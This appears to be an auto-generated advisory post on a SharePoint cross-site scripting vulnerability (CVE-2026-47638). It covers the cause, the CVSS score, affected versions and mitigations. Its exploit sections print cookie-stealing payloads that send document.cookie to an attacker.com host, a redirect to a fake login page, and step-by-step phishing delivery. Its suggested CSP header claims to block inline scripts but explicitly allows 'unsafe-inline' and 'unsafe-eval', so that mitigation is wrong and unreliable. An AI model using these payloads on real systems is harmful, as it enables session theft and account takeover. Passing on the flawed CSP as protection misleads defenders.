Microsoft Office SharePoint, Cross-site Scripting (XSS), CVE-2026-47638 (MEDIUM) -DC-Jun2026-356

By /

Listen to this Post

Intro

CVE-2026-47638 is a cross‑site scripting (XSS) vulnerability in Microsoft Office SharePoint. The root cause is the improper neutralization of user‑supplied input during web page generation (CWE‑79). When SharePoint constructs a page, it fails to safely encode or validate certain data, allowing an authenticated attacker to inject arbitrary JavaScript code into the page’s output.
An attacker who has valid SharePoint credentials and permission to modify content can craft a malicious request containing a script payload. If a victim – typically a higher‑privileged user – later opens the compromised page, the injected script executes within the victim’s browser in the security context of the SharePoint site.
Because the script runs under the victim’s session, the attacker can perform spoofing attacks. For example, the script can alter the page’s content to mimic a trusted login form, change displayed data, or redirect the victim to a malicious website. More advanced scripts can exfiltrate the victim’s session token (document.cookie) or perform actions on behalf of the victim, such as granting the attacker additional permissions.
The vulnerability is reflected (or possibly stored) and requires the victim to interact with a malicious link or page. The CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N vector indicates a medium severity (4.6). The attack is network‑based, low complexity, requires low attacker privileges, and needs user interaction. The scope is unchanged; confidentiality and integrity are partially impacted, while availability is unaffected.
Affected products include Microsoft SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition. No specific version numbers are publicly disclosed, so any release of those products prior to a security update is vulnerable. Microsoft is expected to issue a patch on the next Patch Tuesday (July 14, 2026).

DailyCVE Form

Platform: Microsoft Office SharePoint
Version: 2016/2019/Subscription
Vulnerability: Cross-site Scripting
Severity: MEDIUM
date: 06/09/2026

Prediction: July 14, 2026

What Undercode Say

Analytics

Check SharePoint version via PowerShell
Get-SPFarm | Select BuildVersion
Test for reflected XSS with curl
curl -k "https://sharepoint.example.com/_layouts/15/somepage.aspx?param=<script>alert('XSS')</script>"
Example XSS payload stealing session cookies

<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

Example XSS payload redirecting to a spoofed page

<script>
window.location = 'https://attacker.com/fake-login.html';
</script>

Exploit

  1. Reconnaissance – Identify a SharePoint endpoint that reflects user input without proper encoding (e.g., search result pages, custom error handlers, or user‑modifiable content fields).
  2. Craft Payload – Inject a JavaScript payload into the vulnerable parameter, for example: 
    <script>fetch('https://attacker-controlled.com/steal?cookie='+document.cookie)</script>
  3. Deliver – Send the malicious link to a victim via email, chat, or any medium that will cause them to click while authenticated to SharePoint.
  4. Exfiltrate – The victim’s browser executes the script, sending session cookies (or other sensitive data) to the attacker’s server.
  5. Spoof – Using the stolen session, the attacker can impersonate the victim, perform actions on their behalf, or display misleading information.

Protection

  • Apply Security Update – As soon as Microsoft releases the July 2026 Patch Tuesday cumulative update, install it on all SharePoint servers.
  • Content Security Policy (CSP) – Add a strict CSP header to `web.config` to block inline scripts: 
    <add name="Content-Security-Policy" value="default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'none'" />
  • Output Encoding – Use `SPHttpUtility.HtmlEncode()` for any user‑supplied data rendered on a page.
  • Input Validation – Validate and sanitize all user inputs, especially those that appear in URLs or are stored and later displayed.
  • Least Privilege – Limit content‑editing permissions to only those users who absolutely need them.

Impact

  • Spoofing – An attacker can present fake content that appears legitimate, tricking users into disclosing credentials or performing unintended actions.
  • Session Theft – Stolen authentication cookies allow the attacker to impersonate the victim, gaining access to all data and actions the victim can perform.
  • Data Exfiltration – Confidential data visible in the victim’s browser (e.g., document content, lists, personal information) can be extracted.
  • Account Takeover – Combined with other weaknesses, the stolen session can lead to full compromise of the SharePoint account and possibly domain credentials.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top